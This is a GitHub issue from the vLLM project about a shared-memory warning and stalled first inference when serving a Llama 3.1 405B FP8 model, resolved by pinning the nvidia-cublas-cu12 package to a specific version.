[Bug]: After vLLM successfully starts the service, a warning appears during the first inference and inference cannot proceed normally #7893

Closed
1 task done
fu1996 opened this issue Aug 27, 2024 · 2 comments
Labels
bug Something isn't working

Comments

@fu1996

fu1996 commented Aug 27, 2024

Your current environment

The output of `python3 -m vllm.entrypoints.openai.api_server --model /data0/models/405B-instruct-FP8 --swap-space 16 --tensor-parallel-size 8 --served-model-name llama-3.1-405B --host 0.0.0.0 --port 8081 --max-num-seqs 256 --enforce-eager`
INFO 08-27 10:47:25 logger.py:36] Received request cmpl-cbb8382b602e4d39b88f0c5f955da4f1-0: prompt: '你是谁?', params: SamplingParams(n=1, best_of=1, presence_penalty=0.0, frequency_penalty=0.0, repetition_penalty=1.0, temperature=0.0, top_p=1.0, top_k=-1, min_p=0.0, seed=None, use_beam_search=False, length_penalty=1.0, early_stopping=False, stop=[], stop_token_ids=[], include_stop_str_in_output=False, ignore_eos=False, max_tokens=100, min_tokens=0, logprobs=None, prompt_logprobs=None, skip_special_tokens=True, spaces_between_special_tokens=True, truncate_prompt_tokens=None), prompt_token_ids: [128000, 57668, 21043, 112471, 11571], lora_request: None, prompt_adapter_request: None.
INFO 08-27 10:47:25 async_llm_engine.py:174] Added request cmpl-cbb8382b602e4d39b88f0c5f955da4f1-0.
/root/miniconda3/envs/vllm-0.5.4/lib/python3.11/multiprocessing/resource_tracker.py:254: UserWarning: resource_tracker: There appear to be 1 leaked shared_memory objects to clean up at shutdown
  warnings.warn('resource_tracker: There appear to be %d '

🐛 Describe the bug

No custom code is involved; the warning appears as soon as the service starts and the first inference request is sent.
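
For reference, a minimal request matching the logged prompt and sampling parameters (a sketch reconstructed from the log above; the port, served model name, max_tokens, and temperature all come from the startup command and the "Received request" line):

curl http://localhost:8081/v1/completions \
  -H "Content-Type: application/json" \
  -d '{"model": "llama-3.1-405B", "prompt": "你是谁?", "max_tokens": 100, "temperature": 0}'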

The nvidia-smi output is:

NVIDIA-SMI 535.161.07 Driver Version: 535.161.07 CUDA Version: 12.2

The uname -a output is:
Linux VM-0-16-centos 5.4.119-19.0009.28 #1 SMP Thu May 18 10:37:10 CST 2023 x86_64 x86_64 x86_64 GNU/Linux

The GPU is an NVIDIA H20.

Before submitting a new issue...

  • Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the documentation page, which can answer lots of frequently asked questions.
fu1996 added the bug label on Aug 27, 2024
@fu1996
Author

fu1996 commented Aug 27, 2024

Solved: the underlying nvidia-cublas-cu12 dependency was the wrong version.
pip3 install nvidia-cublas-cu12==12.3.4.1 -i https://pypi.tuna.tsinghua.edu.cn/simple
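
To confirm the pin took effect before restarting the server, check the resolved wheel and the CUDA build PyTorch reports (a minimal sanity check, assuming the vllm-0.5.4 conda env from the logs is active):

pip3 show nvidia-cublas-cu12
# the Version: line should read 12.3.4.1 after the reinstall
python3 -c "import torch; print(torch.version.cuda)"
# prints the CUDA version torch was built against, for comparison with nvidia-smi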

fu1996 closed this as completed on Aug 27, 2024
vllm-project deleted a comment from amir1387aht on Aug 27, 2024
github-staff deleted a comment from fu1996 on Aug 27, 2024
github-staff deleted a comment from jeejeelee on Aug 27, 2024
@allenz92

Solved: the underlying nvidia-cublas-cu12 dependency was the wrong version. pip3 install nvidia-cublas-cu12==12.3.4.1 -i https://pypi.tuna.tsinghua.edu.cn/simple

Hi Fu, how did you find out about the version mismatch?
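
A plausible way to spot this kind of mismatch is to compare the CUDA wheels pip resolved against the libcublas the running server actually maps (a sketch; <PID> is a placeholder for the api_server process ID):

pip3 list | grep -i cu12
# lists the installed nvidia-*-cu12 wheel versions
grep libcublas /proc/<PID>/maps
# shows which libcublas.so the live process has loaded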
